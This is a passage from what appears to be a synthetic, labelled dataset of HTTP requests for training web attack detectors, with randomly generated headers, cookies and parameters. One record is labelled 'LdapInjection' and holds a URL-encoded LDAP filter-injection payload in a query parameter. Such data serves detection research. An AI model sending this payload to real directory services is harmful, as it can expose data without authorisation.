Proxy-Authorization: Basic ZXBldG1iOnBpYXM=
Authorization: NTLM cmFuc2NtM29uV2FndDViMWlvMmVuMWh6YWh0aG1vbmpvdGRvaGg=
Range: 6-9
Referer: http://www.TOiumsi.it/oaxhmagi.php4
TE: trailers
Trailer: Date
User-Agent: eienneojl
UA-CPU: 68000
UA-Disp: 6638,4343,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 6206x0801
Via: HTTP/2.7 www.nfjrto.tiff:219
Transfer-Encoding: lrtw
Upgrade: ejodco/1.2, nnhlf/2.2, sht/7.3, 6nmn/0.5, neetes/1.7
Warning: 145 www.Iehgiho.html "wrbmde7w6d7Oeekrmc" 
X-Forwarded-For: 102.24.89.42
X-Serial-Number: 634106000415144
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1719
Start - Id: 11791
class: Valid
GET /e-Z_WWqmbr8QEDZeWJNS/RLdSZk@uGX6if.T/io3s34hoiwaaaTanswNe/lxw/ry/WjI.i1SD/9xYJ0-U0vvgl/ww7YtD1rxMw3pfGoR/bRLG.4XA1I/Alx/rYXDtS954bPzQy/Ptmp_-K@an.css?mochal5Ge=tnsnqawsagdfiawnom&phneelndon=7rSafithjsHfehtp&mu=oncatsecim&isg-0=82877&pdtoiien8soesa=jZava&daU=76600&imReraMsot7eyae=ain73TrenkjAam0rn HTTP/1.1
Host: 55.225.63.146
Connection: keep-alive
Accept: */*
Accept-Charset: euc-cn
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=59
Client-ip: 77.107.19.21
Cookie: lfesmn=Aste
Cookie2: $Version="251"
Date: Mon, 11 Sep 06 18:13:26 CET
ETag: "z0_yBLGoix@aBdRH"
Expect: 100-continue
From: tnsjx@nvlaoadtiu.st
If-Modified-Since: Sat, 28 Jan 06 06:59:29 CET
If-Unmodified-Since: Mon, 19 Jun 06 11:35:08 GMT
If-Match: *
If-None-Match: "vO98C7o1DvoqfApdV"
If-Range: "lUMlRVioo62o_WPbf"
Max-Forwards: 1
MIME-Version: 0.0
Pragma: todw4exm=ud
Proxy-Authorization: Basic aWVlaDo1c3RrdGU2
Authorization: Basic dG9kckl1Om5zbVR0dXA=
Range: 9732-
Referer: /osuMm/4lswa.tiff
TE: deflate
Trailer: From
User-Agent: Mozilla/7.8 (Windows; U; Win98 9.6; uz-mD; rv:9.7.3) Gecko/44192839
UA-CPU: x86
UA-Disp: 580,584,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0954x9922
Via: 0.3 www.os0ashaz.jpeg
Transfer-Encoding: identity
Upgrade: meE/0.7
Warning: 010 93.171.200.42 "zs5dwspM1loAab" 
X-Forwarded-For: 92.235.100.67
X-Serial-Number: 89221086551285
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11791
Start - Id: 16554
class: Valid
GET /oE41db6EMJBl6/tlS/sSVadDtnNTRK_tc/srLiuonsrejodt/tihnTFitaolT/inerepMtitT.php4?r7ke5rzghhhn1Ea=77057&ns=ngiQTsA&ant=e%25zauobinhis&aauekltedzh8To=dxe_&ctsr6io=RpaoTRutt%2F%3Aa%40&tEaho=rretlotsRmn&zshNot5tdjnr=de++r%40%25iip%7Ed&de=%3C%7E3+http&CIaewxtniy=fnUtmso&nae9rfaloeL=927755&u0cH8wwODtmEaa=dURlL&xgc=hgea HTTP/1.0
Host: 159.21.160.104
Connection: close
Accept: image/gif
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.5
Accept-Language: eH5iT-Iw, i-Jo, 0ee-irIdW;q=0.2
Cache-Control: max-age=17
Client-ip: 110.75.170.196
Cookie: teuch6tb=uuu0fbf6BH;VDCYZe5CaI=otxsNupcweoU;phttp.YDN3TK-_=aTt;orobo=OFH9o;tbWElora=Tlanadttrfl
Cookie2: $Version="756"
Date: Tue, 05 May 09 14:45:43 UTC
ETag: W/"tbbxWf8euU2lA2q61VUP"
Expect: efeio
From: o7mnatoB@rrengt.ch
If-Modified-Since: Wed, 17 Jun 09 05:18:05 CET
If-Unmodified-Since: Thu, 18 Nov 04 08:36:01 CET
If-Match: *
If-None-Match: "6fACpCMRfTf.qmKwu"
If-Range: Tue, 15 Mar 05 21:26:24 UTC
Max-Forwards: 2
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: Digest opaque="xtszaee"
Authorization: Basic dE9lNDptNG4yeA==
Range: -098113
Referer: http://tlm75ei.org/divasnoo/ciag/d5q9ea.conf
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/5.1 (compatible; Konqueror/4.7; Solaris; ahLko1ud)
UA-CPU: x86
UA-Disp: 2808,9760,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 9430x4545
Via: 1.0 www.bamG.css:6994, doe/4.1 53.77.10.126, 5.7 www.dNots4.tiff
Transfer-Encoding: gzip
Upgrade: yru/2.9, iNeed/4.4, EOio/3.5, a5xeU/5.9, 5omle/9.1
Warning: 574 www.ragnqoh.htm "mte2te" 
X-Forwarded-For: 184.226.48.9
X-Serial-Number: 4070028617537255
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 16554
Start - Id: 21860
class: Valid
GET /kcovg/Dsamp_RKfSTi_T2W/l1deehaT/nph-Ttyw/idiSGm@R-j3ftf2JVU/mmkett9eot/HGscmd.asmx?hadT=enk&drYxeys=607003767&5S45thew3tbr=a74a_Ygh%40qZ&Oewscg=eexecjnare-ah&elijnh=sriteTnehi&lANrxiehn=%24&yTc=anednseeDdyr4ul&eoTatkrfo=7899524571&entStisuote=eore%3A HTTP/1.1
Host: 55.121.186.219
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: 5gidfaB-i2or, eh0Ie7n-y;q=0.0, 0e39b-zase0O, Tdhlnel0-enwo
Cache-Control: only-if-cached
Client-ip: 127.36.79.82
Cookie: BtmpSs=+texecbeETwri330s
Cookie2: $Version="1"
Date: Sun, 03 Jan 10 22:32:00 GMT
ETag: "_oWm6wFQ0bxMU5_"
Expect: 100-continue
From: iese@tecT.fr
If-Modified-Since: Wed, 11 May 05 20:18:08 GMT
If-Unmodified-Since: Thu, 10 Nov 05 05:03:05 UTC
If-Match: *
If-None-Match: "V7u8idGfCmTAndio"
If-Range: Fri, 02 Nov 07 22:53:15 UTC
Max-Forwards: 5802
MIME-Version: 8.9
Pragma: Rectdge=sea
Proxy-Authorization: Digest response="D5B0a7D66ce9CaDc9B7fbC4bBDdCb0cC"
Authorization: roifRm i3nte=9hwSafc
Range: 127-,459-41979
Referer: http://euRt.com/OidC.rar
TE: trailers,chunked,gzip
Trailer: Connection
User-Agent: Mozilla/7.2 (compatible; MSIE 3.2; Win 9x; zefe)
UA-CPU: StrongARM
UA-Disp: 488,0035,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 3901x4660
Via: 8.1 48.81.153.143, 9.1 www.msDt.css:5
Transfer-Encoding: identity
Upgrade: ehlec4/7.5, etieo/5.3, 3cri9/3.1, neAm/6.9, neum/3.4
Warning: 312 www.ln8onMov.shtml "tEn0djA" 
X-Forwarded-For: 180.152.252.21
X-Serial-Number: 0932215457430057404
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 21860
Start - Id: 29715
class: Valid
GET /mH2wSxNoNq/nwj9Hkw/Ph/oaadehclYtlkn8/iVWw/np0tW6yjLtGNG-vWJ.bd/cdjasomooHrO0xxoddp/oz9eaia9smeL/hy13A5Wz6KZ/varsnetcatd.htm?Gn7ijbslA9=sinsertfae&h4ioa=2&J-DBWdA53=n+position&9tmpNA=ivdaMaioaLb&4xbsbHEj=5tAr&eeweohhoba0X=27105&nerO2=367610&t6enhtoiwcam9=5547&astdinpD17y32veE=38273455&8dbmsad7=954&E-aWYB.=Dtelnets&oTo7fmi=%29dn&f7hcrB=msc5%2BocvSkg%25idu&sanh=38 HTTP/1.0
Host: 179.211.53.36:80
Connection: a3q6legn
Accept: audio/*, image/*;q=0.7, image/*;q=0.2
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: 9heg=hhqtU
Client-ip: 193.153.56.245
Cookie: siqbkhpNg=ijraoaTdfi@e;gkte8htneopHcnh=drJMntSieqh;having25O=hoAcciketeslaro;OwpJ49agur=md a;nnsoebaoiwt=9553703;TByhr9saeih=50106
Cookie2: $Version="8"
Date: Mon, 20 Oct 08 02:49:52 CET
ETag: "jM1JlLTHaO7whHxUet"
Expect: zojseoE=aet1tis;9eih
From: nonai@Twda.it
If-Modified-Since: Mon, 13 Dec 04 11:56:00 GMT
If-Unmodified-Since: Mon, 27 Feb 06 18:24:36 UTC
If-Match: "0JoNtD5u7kAOI7C"
If-None-Match: "bBNPUBtey@-OXiIkw"
If-Range: Thu, 07 Aug 08 20:26:49 UTC
Max-Forwards: 004
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Basic d2NpZnRyeTpvdFVnZWxocw==
Authorization: Basic aXR0c3JDOkhrNmdl
Range: 229-9780
Referer: /upce/cjRAlNfa.bin
TE: trailers,trailers
Trailer: User-Agent
User-Agent: chnulno/3.0.5.9
UA-CPU: MIPS
UA-Disp: 0925,6962,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 502x1724
Via: HTTP/7.5 www.juoD.shtml, 1.2 www.r1rK8peg.gif, 8.4 www.n9s0.tiff
Transfer-Encoding: identity
Upgrade: mOze/0.8, daji/4.9, odn/5.9
Warning: 839 www.Adlc.css "l0hFhseecnn" 
X-Forwarded-For: 240.221.237.220
X-Serial-Number: 2911766071168
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29715
Start - Id: 27421
class: Valid
GET /Zlgls/hrmkSU/4n5uXgH3/EmomatithW/eQEb1l_/EoJCs7pl/a-/toQient/ytGWQXM6EUxbR/n8ohilAe1hp/dR3snVa0mE/ey-u96kXJ9F_b5.sh?aeae7mi=unebe1t%5Css&tecoomviot=47147&fhe=apositionaal&EyiDctala=a&echocasrrh=4a&ndrnreetCRb=aN7E HTTP/1.0
Host: 95.151.89.212
Connection: keep-alive
Accept: video/*;q=0.4, application/postscript
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=6710
Client-ip: 139.27.230.88
Cookie: ae=$n e;weNgchrwam=tEB;rhngefeu=susr;5k5aseMnhwydhe=ou
Cookie2: $Version="536"
Date: Tue, 05 Aug 08 21:56:30 UTC
ETag: "90lNt1MOgJNu@cgl.25"
Expect: 100-continue
From: mkpuh@Norr.org
If-Modified-Since: Thu, 15 Jan 04 01:41:59 UTC
If-Unmodified-Since: Sun, 20 Jan 08 18:30:46 GMT
If-Match: "U9qzHFD.PRu2ARQDF"
If-None-Match: "byctyBZyAZN06REcu"
If-Range: *
Max-Forwards: 67
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: Digest opaque="ouetdaue"
Authorization: Digest nc=050aE77a
Range: 1-934014,17-,-15857
Referer: http://www.qurgt.uk/utsAaee/me1w/nxprsk2E/o0atat7/ihh6N.exe
TE: trailers
Trailer: If-Modified-Since
User-Agent: lYUAwb9@ http://www.8djdhre.st
UA-CPU: x86
UA-Disp: 7900,686,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 759x1141
Via: HTTP/7.1 134.164.218.32
Transfer-Encoding: compress
Upgrade: e9st/6.7, aiat/8.4, uCEhe/7.1
Warning: 822 www.aJHeb.gif "Ee3Jmyqt1htasneg" 
X-Forwarded-For: 39.176.137.22
X-Serial-Number: 012150343166763006
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27421
Start - Id: 38002
class: LdapInjection
GET /eesrElMr/n3eTDhgTselD_9/nEN/8EDpasswdpsrJ0Xprocessing-instructionS/1F/acpfycautrvigfct/au/ulUgLG.js?piNe6ijaedpsyrh=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&adEMToemexxa=09720362&kWsxqagri=hi&esOnefhaiSolx=g&rue8Hictuaahum=54 HTTP/1.1
Host: 45.77.236.150
Connection: close
Accept: */*
Accept-Charset: us-ascii, cp-932;q=0.9, x-mac-arabic;q=0.6, iso-2022-jp;q=0.1, ks_c_5601-1987;q=0.8
Accept-Encoding: compress, deflate;q=0.2, identity, identity
Accept-Language: *
Cache-Control: max-stale
Client-ip: 206.83.241.99
Cookie: weeejqlsAero=a
Cookie2: $Version="5"
Date: Sun, 13 Nov 05 14:03:20 UTC
ETag: W/"UDst@tJde@GHR5NuG09g"
Expect: 100-continue
From: inr9@eduqt.it
If-Modified-Since: Wed, 23 May 07 12:13:34 UTC
If-Unmodified-Since: Mon, 02 Nov 09 22:44:33 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 05 Jul 05 23:48:45 CET
Max-Forwards: 5116
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: Digest response="02dffa1Fb829C3fbED3BBcFED96d7571"
Range: 17672-41
Referer: http://www.ntye.uk/frhrotaZ/fxos.php3
TE: trailers
Trailer: Connection
User-Agent: iuacaetec9sjddse
UA-CPU: Sparc
UA-Disp: 8564,925,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 880x8476
Via: sotboi/1.1 www.nRba8ie4.png, 1.8 www.ouxe.gif, FTP/5.6 www.tLiue.shtml
Transfer-Encoding: compress
Upgrade: sny/6.3, evf0/1.6, an9/0.7, nscrsa/2.9
Warning: 461 www.3izrso.tiff "rrcdd92qh0Axrii" 
X-Forwarded-For: 69.225.134.146
X-Serial-Number: 800649
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38002
Start - Id: 7369
class: Valid
PUT /ut7Y6N9pTffkoEy0WU/mThp62n4PbZ/o2I8aZ5/hzK9kkwV6Qb8SacUN1./gp/wqIa/tbfeieeasea/dgIaiotadzd2ri/_tmpdrophttps6IPM/uRLA0CRC/jTzzK.jpeg? HTTP/1.0
Content-Length: 199
Content-Language: G
Content-Encoding: deflate
Content-Location: http://www.vOoO.biz/s1sitel/rHsthaet.htm
Content-MD5: bm1tcmVvbFJmdGZidHh6MA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 07 Nov 04 21:40:50 GMT
Last-Modified: Sat, 15 Nov 08 17:55:59 CET
Host: 226.174.233.154
Connection: keep-alive
Accept: video/mpeg, text/xml, image/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: o='opg'
Client-ip: 40.118.223.19
Cookie: fHbtu.Uall8= go2;Hr=gse+se2ewm9d;em=nn2o;sovhyases5h4z=uu'jae;Mea=90195
Cookie2: $Version="8"
Date: Wed, 02 Jan 08 21:20:30 GMT
ETag: "4n1OEXxdHpCrGn1"
Expect: 100-continue
From: toboche@ata6xsirt.st
If-Modified-Since: Mon, 19 Nov 07 16:06:49 GMT
If-Unmodified-Since: Thu, 16 Feb 06 09:31:25 GMT
If-Match: "cIHFtIduCBBaMMfwr8"
If-None-Match: *
If-Range: Thu, 30 Aug 07 01:10:44 GMT
Max-Forwards: 12
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: NTLM dGoyc3RobnNpSTdjbUVlYXVoZW1lM3RhbW8wT21vdFJJbjZldnJjMDdEZWdhSW9z
Authorization: Digest nc=Ee180baC
Range: -69050,-4,502550-
Referer: /et8eIo/oo6eph/fnj3s.fgf
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/8.5 (X11; U; Open BSD i386 6.1; 6h-ln; rv:0.7.6) Gecko/60620041
UA-CPU: StrongARM
UA-Disp: 457,861,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 850x401
Via: 9.2 www.dr3T.tiff:586
Transfer-Encoding: compress
Upgrade: Tcl/1.4, hde/4.4, fe2s6/8.8, prra/7.3, ta2/1.0
Warning: 556 134.7.7.53 "loiQefflen" 
X-Forwarded-For: 114.0.180.179
X-Serial-Number: 33978029627174385263
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

clspa=tuauderniih6w&likeLnsGTM0=5iitrlenwttrko&iaumslHi=78817&pilednyaeMhrr=1&pe3tt=Aaabhtpassa pcchild7an&Siecteithto=r&uedmr=1&Uform3uu1=s//o&hPRe=e=uts&tUsmireEk=754877&eAuGbosxo2lnile=limge

End - Id: 7369
Start - Id: 6838
class: Valid
POST /oZrpMlL2s.dNJw1qFJ/mal/aUzVAa/d_vvbscriptCA/fyI0W22YA/aLKS6/rwhGP0/l8b7aYQDa.0t/2@/am__ZEmUCAVXBxV19.asmx? HTTP/1.1
Content-Length: 260
Content-Language: Tnkmcead,uHdEn,nU
Content-Encoding: gzip
Content-Location: /mrlsbe/tinevum.nsf
Content-MD5: cmhwZ2NuZm5kNXR3ZXRhdA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 27 Dec 09 20:41:18 CET
Last-Modified: Wed, 01 Mar 06 19:42:13 UTC
Host: 11.163.81.229
Connection: ni9n
Accept: */*
Accept-Charset: windows-874, iso-10646-ucs-2;q=0.1, x-mac-cyrillic, windows-1254;q=0.2
Accept-Encoding: 
Accept-Language: tdie-s;q=0.5, enfBefos-n;q=0.4
Cache-Control: min-fresh=83
Client-ip: 133.77.123.5
Cookie: 20ia=v$;pAyTdmme8=a h g;ae7at0odfrll=t$;CkGLcopyallGhQM1=uyebawoldatr;mncy3t=c2Jr787C;I-binMACNmknEO=ak
Cookie2: $Version="49"
Date: Tue, 17 Jun 08 08:46:40 GMT
ETag: "gEp5UJJk2-.LHHm"
Expect: 100-continue
From: dbae4ti@tmraxarsak.gov
If-Modified-Since: Sun, 23 Jul 06 15:08:51 GMT
If-Unmodified-Since: Sun, 14 Jan 07 19:40:08 UTC
If-Match: "edOroc9F8uI1p86"
If-None-Match: "4Z-QdmEQhURDJqt-1gU"
If-Range: *
Max-Forwards: 37
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: Basic dG9hZm9vcm46aW9yRWJwdXk=
Authorization: Digest realm
Range: 708-,54-
Referer: http://www.aetn9.de/Br2ahdl/s3Hn.msf
TE: chunked
Trailer: Host
User-Agent: srmsee2o8e
UA-CPU: 68000
UA-Disp: 469,437,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 302x0187
Via: FTP/0.9 www.sve3eht.png:475
Transfer-Encoding: compress
Upgrade: adhoe/1.9, tFp/6.3, Sodh/1.5, htccnv/7.0, Teeeqf/9.6
Warning: 649 203.53.186.124 "goDwmmazMte" "Fri, 23 Sep 05 06:11:33 UTC"
X-Forwarded-For: 38.119.21.192
X-Serial-Number: 95461590331
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~

es=|a=&et4crnne9=9&5bycd=&6I&aO4tO=laT&ay2vaemenute6ei=4918&wrnrtbz3mao=e 0apSel=mailschildid&euiuhtloetemtc=708319&1nilioNrs4wdrtn=eLe&0evbscriptcRNeM6=NlS+ezselectlinkhaving=:ido&sux=9ys1htEx&Jsnurtimr0hyq8h=8VCkX@cU&at0muun3Gpa=tIAj@cGgVNd

End - Id: 6838
Start - Id: 13607
class: Valid
GET /4t8n5O/cOmMLuLuXLOGOXg1EA0n/C@odfhDn/ajE/hLyj/iERXia/a3QIe3MU1CKA1svezn2p/rictnlieaieErts3d/K1mUNftpA4i/dpKbetweenwp-JCcmdD9h7eu/9iippinra.gif?5e6lsU=4401152&eoncaeein=648570127&inputvG5CO=mhdropOoww%3Fi3&8ufsp1njra=961275&yetuinVe=229&sirtvcuemrae=rbh&Sb@IyKq=521595649&eAeeGi=e02%40lG%40&soteqe=969&ur=Qaevaz HTTP/1.0
Host: www.n3smk.it:80
Connection: close
Accept: */*;q=0.8
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: ertbinc-a;q=0.9, eoeT3tt-b, h4l-2Msp;q=0.1, ns-f, eex-bhc;q=0.1
Cache-Control: no-store
Client-ip: 239.64.215.236
Cookie: deihmzitrmwdaic=dOo8itcnodeE4 sd;l0CAPgwRqI=5QGyTzlRk@UD;osfGmRvm=n$aq;ebneapSsehoeyse=irE;h1tiiEh=sonnysbTU
Cookie2: $Version="796"
Date: Wed, 25 Oct 06 23:19:07 UTC
ETag: "Cmu7VHMBILRmsn4Wb5"
Expect: 100-continue
From: hwaei@ybC13e6.ch
If-Modified-Since: Thu, 21 Sep 06 11:53:02 UTC
If-Unmodified-Since: Fri, 02 Apr 04 17:06:30 GMT
If-Match: "ugtVk1tmoD3VdcPiYox"
If-None-Match: *
If-Range: Thu, 28 Feb 08 02:37:16 GMT
Max-Forwards: 75
MIME-Version: 2.9
Pragma: k=9ednvu
Proxy-Authorization: NTLM bWVpNmFhc282ZGRzckh3bUl0dzhoNnJlaW83V2ZDb3RyU25z
Authorization: Digest username="aamrsee"
Range: 8-93898,-3983,-5248
Referer: /rwltNgq/encwbiu.aspx
TE: deflate
Trailer: Host
User-Agent: Mozilla/2.1 (X11; U; SunOS sun4u 3.0; er-ta; rv:9.7.6) Gecko/28593504
UA-CPU: Sparc
UA-Disp: 712,8493,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 2265x4152
Via: 9.9 www.hrRaa.tiff
Transfer-Encoding: identity
Upgrade: ksola/7.8, haEuhh/9.9, nrh/5.2, Dl0m/5.1
Warning: 667 193.214.100.224:730 "rhuswliziie6a" "Sat, 17 Apr 04 22:29:46 CET"
X-Forwarded-For: 48.26.121.103
X-Serial-Number: 5747927259472661
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13607
Start - Id: 34823
class: Valid
PUT /nEaBkNRsmY_TwENVtv7/awYdWGupVN1Ls26cG-JA/xojV4aId/mihIttrqeesi/eDzD/q1loeiistn2ip2Breexi/ohChnnnil/ehcjeoY.png? HTTP/1.1
Content-Length: 150
Content-Language: sia,tfe
Content-Encoding: gzip
Content-Location: /Itteel9e/nccidwr/p53ad/pet9nle.cfm
Content-MD5: bnZvbUUzaXd0dGhkc3RybQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 23 Jun 07 21:27:03 GMT
Last-Modified: Thu, 05 Mar 09 02:34:29 GMT
Host: www.Ttoaedo.cz
Connection: tdOteamp
Accept: video/quicktime;q=0.9, video/*
Accept-Charset: isiri-3342;q=0.5
Accept-Encoding: compress, compress, identity
Accept-Language: aonrsere-seeo;q=0.9, stO-edSetO, dbn5-u, Metykyw-5dil;q=0.0, vr-aa6ge8wh
Cache-Control: min-fresh=2
Client-ip: 182.32.15.30
Cookie: hutt2rneewjt=43538;p0mmfgfaoau=0;aru9nobOzrygk=hL3;ejabu=@p /havingrei(suhpilE;9VeWN31WetcmX=hrcsi
Cookie2: $Version="3"
Date: Fri, 22 Jan 10 16:09:42 CET
ETag: W/"Q@AC4Lmw@SZLGtcopsu1"
Expect: rvfkan=I3oV
From: erhtiA@esgifshqt.ch
If-Modified-Since: Mon, 18 Jul 05 12:40:31 CET
If-Unmodified-Since: Fri, 12 Jun 09 03:19:43 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 10 Jun 04 06:52:44 CET
Max-Forwards: 55
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: Basic YTJsaXM6ZzFudEJlZUo=
Authorization: Digest nc=C8Fb25d3
Range: 623768-8270,-361888,-69728
Referer: http://www.5aKhu.cz/oxO2Ooyf/wiwl3u9e.tiff
TE: trailers,trailers
Trailer: TE
User-Agent: Mozilla/3.9 (X11; U; Open BSD i386 0.3; 5m-nS; rv:8.8.3) Gecko/44533223
UA-CPU: Sparc
UA-Disp: 308,802,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 184x4689
Via: nsbs/9.9 www.oorr0ute.shtml:64338, FTP/1.6 www.ucfmx8d2.jpeg
Transfer-Encoding: negeb
Upgrade: urte/7.8, e1ed/9.0, issit/3.7
Warning: 679 78.90.49.212 "tenHtlans6lsj" "Sun, 18 May 08 17:51:15 CET"
X-Forwarded-For: 77.62.199.33
X-Serial-Number: 341663891374755
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

lxnphplBaboe=)eoeut&eq=G' eGw&wCoFmdneer=fsseanan?phpll%[s&f0ii8c9sriOtan9= sock_stream&Rja6attceeMs=la ande&nszsirae8nnn=hw&nisaimtj=agM@

End - Id: 34823
Start - Id: 27593
class: Valid
GET /vu/dei/eTtttot5hbrtnrkEmeh/ohkmlgzncttzPto/h1eoa9qedsg/aV/rgrWnh/e6MDb0E.asmx? HTTP/1.1
Host: www.iienegro.it:80
Connection: tehe
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: gzip;q=0.1
Accept-Language: *
Cache-Control: min-fresh=99
Client-ip: 62.241.68.195
Cookie: cetemlaeueelzax=cloesfip;kwqlogGpS=o3sirbAtdtoajt9rgl
Cookie2: $Version="763"
Date: Sat, 05 Dec 09 07:45:25 CET
ETag: "KVtY7dYtV4waMq2VI35"
Expect: 7ieoel
From: zlez@wi5eiill.ch
If-Modified-Since: Mon, 20 Sep 04 23:35:04 CET
If-Unmodified-Since: Mon, 03 Mar 08 10:30:45 GMT
If-Match: "iB@LeD2rq6QBNq6.i.m"
If-None-Match: "r9JJDrsEskdnUowzmn"
If-Range: Sun, 10 Jul 05 03:45:45 UTC
Max-Forwards: 496
MIME-Version: 7.6
Pragma: 5gyUrak=eEirtO
Proxy-Authorization: NTLM c2V3ZWEyQWhneDhnZnRWdG80dG9tdG5ycnRldHJtY2VpNw==
Authorization: Digest algorithm=MD5-sess
Range: 29139-636434,80033-87
Referer: http://www.eLtlcub.de/yiri9th.mp3
TE: trailers
Trailer: Warning
User-Agent: wmwrmdhlmcsoaiI8c
UA-CPU: 68000
UA-Disp: 883,733,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 632x378
Via: HTTP/2.2 31.39.212.22
Transfer-Encoding: deflate
Upgrade: teoevo/0.3, snoPeb/0.1, 2nelh/5.8
Warning: 166 www.i7eiao8.css "sae2iarEaeg" 
X-Forwarded-For: 206.189.164.246
X-Serial-Number: 981002451847227
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 27593
Start - Id: 32374
class: Valid
GET /iil6Hetraddze.cfm?let=Nw%26Nq4tg%28itnAo&dondv=4 HTTP/1.1
Host: www.nhheeue.gov
Connection: close
Accept: */*;q=0.6
Accept-Charset: *;q=0.4
Accept-Encoding: identity
Accept-Language: *;q=0.5
Cache-Control: no-transform
Client-ip: 104.115.242.68
Cookie: e7ihe6tolge=eea1dawI2rceSLuetw;p1ina=urNfrarmetapetp
Cookie2: $Version="300"
Date: Tue, 16 Jun 09 14:19:28 GMT
ETag: "bcP7TEQV0EcuH2331p"
Expect: tnihyS=onbV
From: nTc4g7an@ldne.de
If-Modified-Since: Tue, 31 Mar 09 21:07:04 GMT
If-Unmodified-Since: Sat, 08 Aug 09 02:33:37 GMT
If-Match: "1s3e8rAL4-RDUFq"
If-None-Match: "x4U6p2qnX7XmdBAmJgr"
If-Range: Wed, 14 Jan 04 24:27:57 UTC
Max-Forwards: 4906
MIME-Version: 4.2
Pragma: bde=idcdet
Proxy-Authorization: NTLM Y2l1YXR0bnBuZWJsaWF5a2VyZW9ucGg5Z3VpbnVlcGRkcmV5dHh0MGkzbw==
Authorization: edwif dvrR=Nkbehuta
Range: -767,36952-,-33
Referer: http://t4Ieec.cz/nine5/ctait/gcfuLa.mdb
TE: deflate
Trailer: Host
User-Agent: leevtiwt/5.0
UA-Disp: 0077,169,16
UA-OS: Windows NT
UA-Color: color16
Via: 3.4 84.154.95.176
Transfer-Encoding: gzip
Upgrade: efetu/5.8, xwp/3.1, aeabu/6.7
Warning: 626 www.8nnanJh1.js "cilEofpcabieeSl0p4hz" 
X-Forwarded-For: 36.205.47.170
X-Serial-Number: 23725879192899217413
----: ---------------
~~~~~: ~~~~~~~~~~

null

End - Id: 32374
Start - Id: 25933
class: Valid
GET /8AorjeZOLeQkF/hxtearnVricdr/s3uC-B1EZb8viC3EHOoA/ot8tiaesleeOtt1Bylh/hM.adc.js?nood=scriptf&oevteosee=wJcR&es=cadinput&lh=droprioafetint83&dtraa=6761443 HTTP/1.0
Host: www.retoqvhwe.org:9
Connection: keep-alive
Accept: audio/x-wav;q=0.5, video/*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ia-saneyxiu, hru-ne7V;q=0.9
Cache-Control: no-cache
Client-ip: 5.150.27.149
Cookie: 6pee=r>x2lr'Hnmeta;cEwO16T=8no lo-q   @t;srehs=tf;mW.Id=j
Cookie2: $Version="741"
Date: Sun, 09 Aug 09 08:34:32 CET
ETag: "eiDN7Tz@qZy.F3MgZQ"
Expect: 0nsepEe=Ea7Q3
From: naaufvp@rOayez.uk
If-Modified-Since: Fri, 23 Dec 05 21:49:04 UTC
If-Unmodified-Since: Thu, 13 May 04 03:26:36 CET
If-Match: *
If-None-Match: "EHcXEA8nKFpkEv3opt"
If-Range: *
Max-Forwards: 2986
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: NTLM bmVoc3llZXdpRXJ0OWtibXdpNXlyZGRpcml3cGxtcnBzZ2FpcW1qNHRF
Authorization: ahtwme 2fda=jhaaQ
Range: -1909,0060-494,6-
Referer: /io7sxen/26eonoy/ehen/altra/h3Eg.gif
TE: trailers,chunked;q=0.3,trailers
Trailer: Host
